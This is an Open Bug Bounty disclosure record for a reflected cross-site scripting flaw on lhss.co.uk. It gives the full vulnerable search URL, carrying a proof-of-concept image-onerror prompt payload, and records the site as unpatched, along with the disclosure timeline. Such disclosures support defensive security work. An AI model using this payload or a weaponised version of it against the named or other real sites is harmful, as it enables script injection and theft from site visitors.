lhss.co.uk XSS vulnerability

2016-08-12T15:33:00
ID OBB:173719
Type openbugbounty
Reporter ShivprasadSambhare
Modified 2016-11-04T17:15:00

Description

Vulnerable URL:
http://www.lhss.co.uk/search-results/?co=q&vi;=1&ty;=31&am;=12&tf;=s5eng2&rc;=7&gi7;=http%3A%2F%2Fwww.lhss.co.uk%2Fwp-content%2Fthemes%2Flimuso%2Fcss%2Fallsearch.css&ro;=1&of;=0&ln;=255&ar;=0&mnxs;_dom=http%3A%2F%2Fwww.lhss.co.uk%2F|&al;=0&sn;=www.lhss.co.uk&dn;=uk&st;=+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FOPENBUGBOUNTY%2F%29%3E%22
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check lhss.co.uk SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 12 August, 2016 15:33 GMT
Vulnerability existence verified and confirmed| 12 August, 2016 17:14 GMT
Generic security notifications sent to website owner| 12 August, 2016 17:14 GMT
Customized security notification sent to website owner| 12 August, 2016 17:14 GMT
Vulnerability details disclosed by researcher| 4 November, 2016 17:15 GMT